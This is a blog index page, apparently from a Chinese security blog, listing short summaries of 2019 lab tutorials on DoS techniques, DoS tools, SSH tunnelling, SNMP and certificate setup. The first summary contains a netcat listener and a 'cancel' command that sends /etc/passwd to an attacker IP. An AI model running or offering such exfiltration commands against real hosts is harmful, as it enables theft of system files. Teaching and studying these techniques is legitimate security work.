摘要: nc -lvvp 7080 开启侦听 cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令 攻击机成功接收到靶机发送信息。 阅读全文
posted @ 2019-03-14 20:08 micr067 阅读(143) 评论(0) 推荐(0) 编辑
摘要: ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于FQ (2)SSH 本地端口转发 使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道 阅读全文
posted @ 2019-03-14 18:06 micr067 阅读(129) 评论(0) 推荐(0) 编辑
摘要: 1.安装CA证书 生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书 选择高级证书申请 将之前生成的base64证书文件内容贴进来 ok,完成 挂起的申请—所有任务—颁发 在颁发的证书中可以看到我们已经申请好 的证书。 访问http://127.0.0.1/certsrv 阅读全文
posted @ 2019-03-14 08:03 micr067 阅读(139) 评论(0) 推荐(0) 编辑
摘要: 1. 简介匿名者发布的 DoS 工具LOICHOICDDoSer招募志愿者发放以上工具以上 DoS 工具不隐藏真实 IP 地址免费DDOS攻击测试工具大合集 FreeBuf 下载链接2. LOIChttps:... 阅读全文
posted @ 2019-03-14 07:26 micr067 阅读(454) 评论(0) 推荐(0) 编辑
摘要: 拒绝服务分类攻击带宽攻击并发消耗cpu内存攻击代码漏洞1. rudy(r-y dead yet)1. 简介慢速应用层HTTP POST攻击,与slowhttptest原理相同每次只传输一个字节的数据美剧黑客军... 阅读全文
posted @ 2019-03-14 07:24 micr067 阅读(250) 评论(0) 推荐(0) 编辑
摘要: 1. 简介应用服务漏洞服务代码存在漏洞,遇异常提交数据时程序崩溃应用处理大量并发请求能力有限,被拒绝的是应用或OS缓冲区溢出漏洞向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存影响: 远程代码执行、... 阅读全文
posted @ 2019-03-14 07:21 micr067 阅读(197) 评论(0) 推荐(0) 编辑
摘要: 1. 简介简单网络管理协议Simmple Network Management Protocol一般用来监控和管理网络设备服务端口UDP 161/162管理站(manager/客户端)、被管理设备(agent... 阅读全文
posted @ 2019-03-14 07:18 micr067 阅读(341) 评论(0) 推荐(0) 编辑
摘要: 1. 简介主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效原理很有趣使用 IP 分段偏移量之间分段覆盖,接收端处理分段覆盖时可被拒绝服... 阅读全文
posted @ 2019-03-14 07:16 micr067 阅读(493) 评论(0) 推荐(0) 编辑
摘要: 1. 简介2008年由Jack C.Louis 发现针对TCP服务的拒绝服务攻击消耗被攻击目标系统资源与攻击目标建立大量socket链接完成三次握手,最后的ACK包中window大小为0 (客户端不接收数据)... 阅读全文
posted @ 2019-03-14 07:14 micr067 阅读(516) 评论(1) 推荐(0) 编辑
摘要: 1. 简介世界上最古老的DDoS攻击技术,smurt攻击只发生在局域网中向广播地址发送伪造源地址的 ICMP echo Request (ping)包LAN 所有计算机向伪造源地址返回响应包对现代操作系统几乎... 阅读全文
posted @ 2019-03-14 07:13 micr067 阅读(299) 评论(0) 推荐(0) 编辑
摘要: 1. 简介DoS 不是 DOS( Denial of Service)利用程序漏洞使服务器奔溃利用大流量一对一资源耗尽DDoS 分布式拒绝服务(Distributed Denial of Service)一对... 阅读全文
posted @ 2019-03-14 07:11 micr067 阅读(121) 评论(0) 推荐(0) 编辑